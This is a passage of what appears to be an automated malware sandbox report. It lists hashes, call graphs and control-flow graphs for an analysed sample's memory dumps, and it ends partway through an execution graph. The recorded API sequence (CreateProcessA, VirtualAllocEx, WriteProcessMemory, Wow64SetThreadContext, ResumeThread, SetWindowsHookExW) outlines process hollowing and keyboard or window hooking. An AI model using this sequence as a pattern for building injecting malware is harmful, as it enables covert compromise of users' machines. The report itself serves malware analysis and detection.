                                                                                          • Opcode ID: daef8705ae1978af028c6add12b207c0ad51f82f4bb37ccf2b05e3fb2f3a5f38
                                                                                          • Instruction ID: 2c78ed0b98668468b5d65116f22002c69849893ce659496f6c2f234580ccc3eb
                                                                                          • Opcode Fuzzy Hash: daef8705ae1978af028c6add12b207c0ad51f82f4bb37ccf2b05e3fb2f3a5f38
                                                                                          • Instruction Fuzzy Hash: 382138B5E002098FCB14CF99D848BEEBBF5EB88310F10842AD419A7690C7759944CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00B03753
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.985697815.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_b00000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID: HookWindows
                                                                                          • String ID:
                                                                                          • API String ID: 2559412058-0
                                                                                          • Opcode ID: 745815c0792b9947d7fa2711b0d1df137fa56975146957fbb5746cb8bde0640d
                                                                                          • Instruction ID: e96f3fc07659c9abd75a5dcad6880242f078db599eab0e0aad67707444ba1b1a
                                                                                          • Opcode Fuzzy Hash: 745815c0792b9947d7fa2711b0d1df137fa56975146957fbb5746cb8bde0640d
                                                                                          • Instruction Fuzzy Hash: 0B21F7B59002099FCB14CF99D848BEEFBF5EB89314F10842AD459A7650C775A944CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.984686179.00000000003FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 003FD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_3fd000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c63d9a38a11bf04df359739a77537f3f02d26fce951f79115500143e90eb35b6
                                                                                          • Instruction ID: 99ca35d06402bc9911c1f5ee45ae1241a01fa38c90f71e40c350ee3fecd134cb
                                                                                          • Opcode Fuzzy Hash: c63d9a38a11bf04df359739a77537f3f02d26fce951f79115500143e90eb35b6
                                                                                          • Instruction Fuzzy Hash: DE216D71504248DFCB16DF14D5C8F36BF66FB89318F20C169DA094B206C336D845DBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.984827817.000000000044D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0044D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_44d000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 534bf23b5ec27b6c00371a804418d4674f3d669d8ea091287012965fb7e4ed56
                                                                                          • Instruction ID: 6d95383967396319021ca25d1759d39d51b7b67c53cb7491730f930f6f4e6266
                                                                                          • Opcode Fuzzy Hash: 534bf23b5ec27b6c00371a804418d4674f3d669d8ea091287012965fb7e4ed56
                                                                                          • Instruction Fuzzy Hash: 8E212970604244DFEB14CF25D9C4B26BB61FB88328F24C96AD9494B346C33BD846CB66
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.984827817.000000000044D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0044D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_44d000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4a25462eeb308c5d919b49cbc733abdc1a1d62b69c7fbff444fc918329978dd3
                                                                                          • Instruction ID: d9f198ae6fab767472760589239fcf63d8284813331b0e13626b8db9f1007455
                                                                                          • Opcode Fuzzy Hash: 4a25462eeb308c5d919b49cbc733abdc1a1d62b69c7fbff444fc918329978dd3
                                                                                          • Instruction Fuzzy Hash: F4214B755093809FDB02CF24D994711BF71AF46314F29C5DBD8888F2A7C33A984ACB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000A.00000002.984686179.00000000003FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 003FD000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_10_2_3fd000_RegSvcs.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 3e0eb5f64e9d98e6057156d14d80c040d3d52ec1448806123a22752ec917bec3
                                                                                          • Instruction ID: b0e690a8c03c44d4f09e594528e869d47ba973157034518ee619a5bd80000995
                                                                                          • Opcode Fuzzy Hash: 3e0eb5f64e9d98e6057156d14d80c040d3d52ec1448806123a22752ec917bec3
                                                                                          • Instruction Fuzzy Hash: 8D11D376404284CFCB16CF14D5C4B2ABF72FB85324F24C5A9D9094B616C33AD95ACBA2
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Execution Graph

                                                                                          Execution Coverage:37.1%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:31
                                                                                          Total number of Limit Nodes:0
                                                                                          execution_graph 1434 212857 1435 212867 1434->1435 1437 2128c0 8 API calls 1435->1437 1436 2128a0 1437->1436 1401 212868 1402 212882 1401->1402 1405 2128c0 1402->1405 1406 2128cf 1405->1406 1426 213b1d 1406->1426 1430 213b28 1406->1430 1407 2130ea 1419 2148b1 VirtualAllocEx 1407->1419 1420 2148b8 VirtualAllocEx 1407->1420 1408 213443 1421 214660 WriteProcessMemory 1408->1421 1422 214658 WriteProcessMemory 1408->1422 1409 2137ff 1414 214660 WriteProcessMemory 1409->1414 1415 214658 WriteProcessMemory 1409->1415 1410 213851 1412 213961 1410->1412 1425 214000 Wow64SetThreadContext 1410->1425 1411 21353f 1411->1409 1417 214660 WriteProcessMemory 1411->1417 1418 214658 WriteProcessMemory 1411->1418 1416 2149d8 ResumeThread 1412->1416 1413 2128a0 1414->1410 1415->1410 1416->1413 1417->1411 1418->1411 1419->1408 1420->1408 1421->1411 1422->1411 1425->1412 1427 213b28 CreateProcessA 1426->1427 1429 213e4f 1427->1429 1431 213baf CreateProcessA 1430->1431 1433 213e4f 1431->1433

                                                                                          Callgraph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          • Opacity -> Relevance
                                                                                          • Disassembly available
                                                                                          callgraph 0 Function_002119A0 1 Function_00211A28 2 Function_00213B28 3 Function_00211AA8 4 Function_00211CA8 45 Function_00212068 4->45 61 Function_00211DC0 4->61 5 Function_00211FAA 6 Function_0021032D 7 Function_00213F2F 8 Function_00210331 9 Function_002148B1 10 Function_00214530 11 Function_002119B0 12 Function_002147B0 13 Function_00210335 14 Function_00210238 15 Function_00211A38 16 Function_002148B8 17 Function_002147B8 18 Function_0021203A 19 Function_00214000 20 Function_00211C00 21 Function_00210102 22 Function_00212805 23 Function_00212009 24 Function_00211F95 25 Function_00210215 26 Function_00210219 27 Function_00211C98 27->45 27->61 28 Function_00212698 29 Function_00210698 30 Function_0021021D 31 Function_00213B1D 32 Function_00213F1D 33 Function_0021411C 34 Function_00210061 35 Function_002101E1 36 Function_00214660 37 Function_002100E2 47 Function_00211C68 37->47 38 Function_002119E2 39 Function_00210065 40 Function_002101E5 41 Function_002105E5 42 Function_00210167 67 Function_00211D4C 42->67 43 Function_00210069 44 Function_00211AE8 44->4 44->27 76 Function_002125D8 45->76 46 Function_00212868 60 Function_002128C0 46->60 48 Function_0021006D 49 Function_00210071 50 Function_00210270 51 Function_00213A70 52 Function_002119F0 53 Function_00210075 54 Function_002102F5 55 Function_002102F9 56 Function_00211978 57 Function_002103F8 58 Function_002102FD 59 Function_002127FC 60->2 60->4 60->9 60->16 60->19 60->20 60->31 60->36 75 Function_002149D8 60->75 77 Function_00214658 60->77 62 Function_002103C0 63 Function_00212043 64 Function_002100C7 65 Function_00210448 66 Function_0021024D 68 Function_00210251 69 Function_00210350 70 Function_00210255 71 Function_00210055 72 Function_002105D5 73 Function_00212857 73->60 74 Function_00210059 78 Function_0021185A 79 Function_0021005D 80 Function_002101DD 81 Function_002105DE

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 317 213b1d-213bc1 320 213c23-213c4b 317->320 321 213bc3-213bf3 317->321 324 213caa-213d00 320->324 325 213c4d-213c7a 320->325 321->320 329 213bf5-213bfa 321->329 330 213d02-213d2f 324->330 331 213d5f-213e4d CreateProcessA 324->331 325->324 338 213c7c-213c81 325->338 332 213c1d-213c20 329->332 333 213bfc-213c06 329->333 330->331 347 213d31-213d36 330->347 357 213e56-213f3b 331->357 358 213e4f-213e55 331->358 332->320 335 213c08 333->335 336 213c0a-213c19 333->336 335->336 336->336 339 213c1b 336->339 341 213c83-213c8d 338->341 342 213ca4-213ca7 338->342 339->332 345 213c91-213ca0 341->345 346 213c8f 341->346 342->324 345->345 348 213ca2 345->348 346->345 350 213d59-213d5c 347->350 351 213d38-213d42 347->351 348->342 350->331 352 213d44 351->352 353 213d46-213d55 351->353 352->353 353->353 355 213d57 353->355 355->350 370 213f4b-213f4f 357->370 371 213f3d-213f41 357->371 358->357 372 213f51-213f55 370->372 373 213f5f-213f63 370->373 371->370 374 213f43 371->374 372->373 375 213f57 372->375 376 213f73-213f77 373->376 377 213f65-213f69 373->377 374->370 375->373 379 213f79-213fa2 376->379 380 213fad-213fb8 376->380 377->376 378 213f6b 377->378 378->376 379->380 383 213fb9 380->383 383->383
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00213E3A
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.983359439.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_210000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: 8c85688f9d0376a90a8ac13c35274755d0c47de9195af1de369d6e5d21c9b1e7
                                                                                          • Instruction ID: addc5e67340a18b926cf63b3b47c0f24d84e2642af6b69ac14d18fc7c6aa45eb
                                                                                          • Opcode Fuzzy Hash: 8c85688f9d0376a90a8ac13c35274755d0c47de9195af1de369d6e5d21c9b1e7
                                                                                          • Instruction Fuzzy Hash: 72D13770D042198FDB20CFA8C845BEDBBB2BF59314F0095AAE919B7240DB749A95CF91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 385 213b28-213bc1 387 213c23-213c4b 385->387 388 213bc3-213bf3 385->388 391 213caa-213d00 387->391 392 213c4d-213c7a 387->392 388->387 396 213bf5-213bfa 388->396 397 213d02-213d2f 391->397 398 213d5f-213e4d CreateProcessA 391->398 392->391 405 213c7c-213c81 392->405 399 213c1d-213c20 396->399 400 213bfc-213c06 396->400 397->398 414 213d31-213d36 397->414 424 213e56-213f3b 398->424 425 213e4f-213e55 398->425 399->387 402 213c08 400->402 403 213c0a-213c19 400->403 402->403 403->403 406 213c1b 403->406 408 213c83-213c8d 405->408 409 213ca4-213ca7 405->409 406->399 412 213c91-213ca0 408->412 413 213c8f 408->413 409->391 412->412 415 213ca2 412->415 413->412 417 213d59-213d5c 414->417 418 213d38-213d42 414->418 415->409 417->398 419 213d44 418->419 420 213d46-213d55 418->420 419->420 420->420 422 213d57 420->422 422->417 437 213f4b-213f4f 424->437 438 213f3d-213f41 424->438 425->424 439 213f51-213f55 437->439 440 213f5f-213f63 437->440 438->437 441 213f43 438->441 439->440 442 213f57 439->442 443 213f73-213f77 440->443 444 213f65-213f69 440->444 441->437 442->440 446 213f79-213fa2 443->446 447 213fad-213fb8 443->447 444->443 445 213f6b 444->445 445->443 446->447 450 213fb9 447->450 450->450
                                                                                          APIs
                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00213E3A
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.983359439.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_210000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: b5daa845afbff00531fe9a2ecd987178182407f6cde14d72d532ee9aaaa9ecf5
                                                                                          • Instruction ID: 362fe71ce6640a2c02e9c4fc2aa1f1aafc76336dac8ccdd836a3ec533d6ab209
                                                                                          • Opcode Fuzzy Hash: b5daa845afbff00531fe9a2ecd987178182407f6cde14d72d532ee9aaaa9ecf5
                                                                                          • Instruction Fuzzy Hash: 80D14770D04219CFDB20CFA8C845BEDBBB2BF59314F0095A9E919B7240DB749A95CF91
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 452 214658-2146cb 455 2146e2-214743 WriteProcessMemory 452->455 456 2146cd-2146df 452->456 458 214745-21474b 455->458 459 21474c-21479e 455->459 456->455 458->459
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00214733
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.983359439.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_210000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 72abc899b35409bb612d4d87b828df1cf650a2253a30e397920594f475cceef7
                                                                                          • Instruction ID: eaca6a424546ef5fa29c6e4de695a31db4eac6f4e4b5b19c144fc1645fad8578
                                                                                          • Opcode Fuzzy Hash: 72abc899b35409bb612d4d87b828df1cf650a2253a30e397920594f475cceef7
                                                                                          • Instruction Fuzzy Hash: E541BBB4D012489FCF00DFA9D984AEEFBF1BB4A314F14942AE818B7240D735AA55CF54
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 464 214660-2146cb 466 2146e2-214743 WriteProcessMemory 464->466 467 2146cd-2146df 464->467 469 214745-21474b 466->469 470 21474c-21479e 466->470 467->466 469->470
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00214733
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.983359439.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_210000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: f7f5daebcb01c370253613820ba6f5456aeeb4dce9d55a996323481a6c2c7929
                                                                                          • Instruction ID: fdae975815bbcbab260e24edd9cfc2294aa97354b9fac20828bedf1d945d003b
                                                                                          • Opcode Fuzzy Hash: f7f5daebcb01c370253613820ba6f5456aeeb4dce9d55a996323481a6c2c7929
                                                                                          • Instruction Fuzzy Hash: E741BAB4D012489FCF00DFA9D984AEEFBF1BB49314F20942AE818B7240D734AA55CF64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 475 2148b1-214972 VirtualAllocEx 478 214974-21497a 475->478 479 21497b-2149c5 475->479 478->479
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00214962
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.983359439.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_210000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 53acf65fd37a5573483183c46fd399d6996da8e34c6e78fbe2bae79cbebd13cd
                                                                                          • Instruction ID: cf7180898f3264a839f653e738d6ecd673603a96cfa627da4d6243d13f911a79
                                                                                          • Opcode Fuzzy Hash: 53acf65fd37a5573483183c46fd399d6996da8e34c6e78fbe2bae79cbebd13cd
                                                                                          • Instruction Fuzzy Hash: 4A4197B4D042589FCF10CFA9D884AEEBBB1AB59310F10942AE815B7210D735A955CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 484 2148b8-214972 VirtualAllocEx 487 214974-21497a 484->487 488 21497b-2149c5 484->488 487->488
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00214962
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.983359439.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_210000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 99d148687e04a048723fde72b8ca984e13aaf3fc3ee3822952bfbf7a7f2c61aa
                                                                                          • Instruction ID: f7c25707727cdf7faa0c36d3bebab0adfabe5c6e423f2ce620f67da65fe0450b
                                                                                          • Opcode Fuzzy Hash: 99d148687e04a048723fde72b8ca984e13aaf3fc3ee3822952bfbf7a7f2c61aa
                                                                                          • Instruction Fuzzy Hash: 0C31A8B4D042489FCF10CFA9D884AEEFBB1BB59310F10A42AE814B7300D735A955CFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 493 214000-214060 495 214062-214074 493->495 496 214077-2140bf Wow64SetThreadContext 493->496 495->496 498 2140c1-2140c7 496->498 499 2140c8-214114 496->499 498->499
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 002140AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.983359439.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_210000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 57076f8f4449f226417f0a8da1f22be27c489ea1d16e5712d1d1bc8ab4d31799
                                                                                          • Instruction ID: 021a0fa735a30edfdf82fbde9783c65c5536bd6e68738bfede89681886c1351a
                                                                                          • Opcode Fuzzy Hash: 57076f8f4449f226417f0a8da1f22be27c489ea1d16e5712d1d1bc8ab4d31799
                                                                                          • Instruction Fuzzy Hash: CF31DEB4D012589FCB14DFA9D884AEEFBF0BF49314F14842AE408B7240D738A985CF94
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 504 2149d8-214a66 ResumeThread 507 214a68-214a6e 504->507 508 214a6f-214ab1 504->508 507->508
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000C.00000002.983359439.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_12_2_210000_Client.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 2cb1fb2f8eae68f7f31873a617a34f7f48e9fe3bc0d156c3731c0e9eb991ce1f
                                                                                          • Instruction ID: 0ef77a192ff284af1de1b8562c21f2dc60712f674827ac03f051a72db64712ff
                                                                                          • Opcode Fuzzy Hash: 2cb1fb2f8eae68f7f31873a617a34f7f48e9fe3bc0d156c3731c0e9eb991ce1f
                                                                                          • Instruction Fuzzy Hash: 1631DDB4D012189FCF10DFA9D884AEEFBB4AF49314F10942AE818B7300D735A941CF95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Execution Graph

                                                                                          Execution Coverage:26%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:382
                                                                                          Total number of Limit Nodes:7
                                                                                          execution_graph 29923 280448 29924 280455 29923->29924 29927 285a99 29924->29927 29925 280467 29928 285ac8 29927->29928 29932 286140 29928->29932 29936 286244 29928->29936 29929 285b3b 29929->29925 29934 286149 29932->29934 29933 28623d 29933->29929 29934->29933 29941 28636f 29934->29941 29937 286252 29936->29937 29939 286149 29936->29939 29938 28623d 29938->29929 29939->29938 29940 28636f 21 API calls 29939->29940 29940->29939 29942 28639f 29941->29942 29943 2863c7 29942->29943 29980 287dbb 29942->29980 29988 287ab8 29942->29988 29996 287ca7 29942->29996 30004 2879a4 29942->30004 30012 287721 29942->30012 30022 2876a0 29942->30022 30035 287a2e 29942->30035 30043 287d2b 29942->30043 30051 2877ab 29942->30051 30061 2875d1 29942->30061 30074 287550 29942->30074 30087 287c5f 29942->30087 30095 28765b 29942->30095 30108 287b42 29942->30108 30116 287bcf 29942->30116 30124 287949 29942->30124 30134 287df7 29942->30134 30142 287d73 29942->30142 30150 287a73 29942->30150 30158 2877f0 29942->30158 30168 287afd 29942->30168 30176 28787a 29942->30176 30186 287766 29942->30186 30196 2876e5 29942->30196 30209 287ce3 29942->30209 30217 2874ea 29942->30217 30230 2879e9 29942->30230 30238 287c17 29942->30238 30246 287616 29942->30246 30259 287b87 29942->30259 30267 287904 29942->30267 30277 28758c 29942->30277 30290 28750b 29942->30290 30303 287835 29942->30303 30313 287e3f 29942->30313 30318 2878bf 29942->30318 29981 287dcc 29980->29981 30328 81af91 29981->30328 30333 81aff0 29981->30333 29982 287e24 29983 287e6c 29982->29983 29986 81af91 RegQueryValueExW 29982->29986 29987 81aff0 RegQueryValueExW 29982->29987 29983->29943 29986->29983 29987->29983 29989 287ac9 29988->29989 29992 81af91 RegQueryValueExW 29989->29992 29993 81aff0 RegQueryValueExW 29989->29993 29990 287e24 29991 287e6c 29990->29991 29994 81af91 RegQueryValueExW 29990->29994 29995 81aff0 RegQueryValueExW 29990->29995 29991->29943 29992->29990 29993->29990 29994->29991 29995->29991 29997 287cb8 29996->29997 30000 81af91 RegQueryValueExW 29997->30000 30001 81aff0 RegQueryValueExW 29997->30001 29998 287e24 29999 287e6c 29998->29999 30002 81af91 RegQueryValueExW 29998->30002 30003 81aff0 RegQueryValueExW 29998->30003 29999->29943 30000->29998 30001->29998 30002->29999 30003->29999 30005 2879b5 30004->30005 30008 81af91 RegQueryValueExW 30005->30008 30009 81aff0 RegQueryValueExW 30005->30009 30006 287e24 30007 287e6c 30006->30007 30010 81af91 RegQueryValueExW 30006->30010 30011 81aff0 RegQueryValueExW 30006->30011 30007->29943 30008->30006 30009->30006 30010->30007 30011->30007 30013 287732 30012->30013 30014 28796d KiUserExceptionDispatcher 30013->30014 30015 287989 30014->30015 30018 81af91 RegQueryValueExW 30015->30018 30019 81aff0 RegQueryValueExW 30015->30019 30016 287e24 30017 287e6c 30016->30017 30020 81af91 RegQueryValueExW 30016->30020 30021 81aff0 RegQueryValueExW 30016->30021 30017->29943 30018->30016 30019->30016 30020->30017 30021->30017 30023 2876b1 30022->30023 30339 813050 30023->30339 30344 812ff0 30023->30344 30024 287706 30025 28796d KiUserExceptionDispatcher 30024->30025 30026 287989 30025->30026 30031 81af91 RegQueryValueExW 30026->30031 30032 81aff0 RegQueryValueExW 30026->30032 30027 287e24 30028 287e6c 30027->30028 30033 81af91 RegQueryValueExW 30027->30033 30034 81aff0 RegQueryValueExW 30027->30034 30028->29943 30031->30027 30032->30027 30033->30028 30034->30028 30036 287a3f 30035->30036 30039 81af91 RegQueryValueExW 30036->30039 30040 81aff0 RegQueryValueExW 30036->30040 30037 287e24 30038 287e6c 30037->30038 30041 81af91 RegQueryValueExW 30037->30041 30042 81aff0 RegQueryValueExW 30037->30042 30038->29943 30039->30037 30040->30037 30041->30038 30042->30038 30044 287d3c 30043->30044 30047 81af91 RegQueryValueExW 30044->30047 30048 81aff0 RegQueryValueExW 30044->30048 30045 287e24 30046 287e6c 30045->30046 30049 81af91 RegQueryValueExW 30045->30049 30050 81aff0 RegQueryValueExW 30045->30050 30046->29943 30047->30045 30048->30045 30049->30046 30050->30046 30052 2877bc 30051->30052 30053 28796d KiUserExceptionDispatcher 30052->30053 30054 287989 30053->30054 30057 81af91 RegQueryValueExW 30054->30057 30058 81aff0 RegQueryValueExW 30054->30058 30055 287e24 30056 287e6c 30055->30056 30059 81af91 RegQueryValueExW 30055->30059 30060 81aff0 RegQueryValueExW 30055->30060 30056->29943 30057->30055 30058->30055 30059->30056 30060->30056 30062 2875e2 30061->30062 30068 813050 2 API calls 30062->30068 30069 812ff0 2 API calls 30062->30069 30063 287706 30064 28796d KiUserExceptionDispatcher 30063->30064 30065 287989 30064->30065 30070 81af91 RegQueryValueExW 30065->30070 30071 81aff0 RegQueryValueExW 30065->30071 30066 287e24 30067 287e6c 30066->30067 30072 81af91 RegQueryValueExW 30066->30072 30073 81aff0 RegQueryValueExW 30066->30073 30067->29943 30068->30063 30069->30063 30070->30066 30071->30066 30072->30067 30073->30067 30075 287561 30074->30075 30081 813050 2 API calls 30075->30081 30082 812ff0 2 API calls 30075->30082 30076 287706 30077 28796d KiUserExceptionDispatcher 30076->30077 30078 287989 30077->30078 30083 81af91 RegQueryValueExW 30078->30083 30084 81aff0 RegQueryValueExW 30078->30084 30079 287e24 30080 287e6c 30079->30080 30085 81af91 RegQueryValueExW 30079->30085 30086 81aff0 RegQueryValueExW 30079->30086 30080->29943 30081->30076 30082->30076 30083->30079 30084->30079 30085->30080 30086->30080 30088 287c70 30087->30088 30091 81af91 RegQueryValueExW 30088->30091 30092 81aff0 RegQueryValueExW 30088->30092 30089 287e24 30090 287e6c 30089->30090 30093 81af91 RegQueryValueExW 30089->30093 30094 81aff0 RegQueryValueExW 30089->30094 30090->29943 30091->30089 30092->30089 30093->30090 30094->30090 30096 28766c 30095->30096 30102 813050 2 API calls 30096->30102 30103 812ff0 2 API calls 30096->30103 30097 287706 30098 28796d KiUserExceptionDispatcher 30097->30098 30099 287989 30098->30099 30104 81af91 RegQueryValueExW 30099->30104 30105 81aff0 RegQueryValueExW 30099->30105 30100 287e24 30101 287e6c 30100->30101 30106 81af91 RegQueryValueExW 30100->30106 30107 81aff0 RegQueryValueExW 30100->30107 30101->29943 30102->30097 30103->30097 30104->30100 30105->30100 30106->30101 30107->30101 30109 287b53 30108->30109 30112 81af91 RegQueryValueExW 30109->30112 30113 81aff0 RegQueryValueExW 30109->30113 30110 287e24 30111 287e6c 30110->30111 30114 81af91 RegQueryValueExW 30110->30114 30115 81aff0 RegQueryValueExW 30110->30115 30111->29943 30112->30110 30113->30110 30114->30111 30115->30111 30117 287be0 30116->30117 30120 81af91 RegQueryValueExW 30117->30120 30121 81aff0 RegQueryValueExW 30117->30121 30118 287e24 30119 287e6c 30118->30119 30122 81af91 RegQueryValueExW 30118->30122 30123 81aff0 RegQueryValueExW 30118->30123 30119->29943 30120->30118 30121->30118 30122->30119 30123->30119 30125 28795a KiUserExceptionDispatcher 30124->30125 30127 287989 30125->30127 30130 81af91 RegQueryValueExW 30127->30130 30131 81aff0 RegQueryValueExW 30127->30131 30128 287e24 30129 287e6c 30128->30129 30132 81af91 RegQueryValueExW 30128->30132 30133 81aff0 RegQueryValueExW 30128->30133 30129->29943 30130->30128 30131->30128 30132->30129 30133->30129 30135 287e08 30134->30135 30138 81af91 RegQueryValueExW 30135->30138 30139 81aff0 RegQueryValueExW 30135->30139 30136 287e24 30137 287e6c 30136->30137 30140 81af91 RegQueryValueExW 30136->30140 30141 81aff0 RegQueryValueExW 30136->30141 30137->29943 30138->30136 30139->30136 30140->30137 30141->30137 30143 287d84 30142->30143 30146 81af91 RegQueryValueExW 30143->30146 30147 81aff0 RegQueryValueExW 30143->30147 30144 287e24 30145 287e6c 30144->30145 30148 81af91 RegQueryValueExW 30144->30148 30149 81aff0 RegQueryValueExW 30144->30149 30145->29943 30146->30144 30147->30144 30148->30145 30149->30145 30151 287a84 30150->30151 30154 81af91 RegQueryValueExW 30151->30154 30155 81aff0 RegQueryValueExW 30151->30155 30152 287e24 30153 287e6c 30152->30153 30156 81af91 RegQueryValueExW 30152->30156 30157 81aff0 RegQueryValueExW 30152->30157 30153->29943 30154->30152 30155->30152 30156->30153 30157->30153 30159 287801 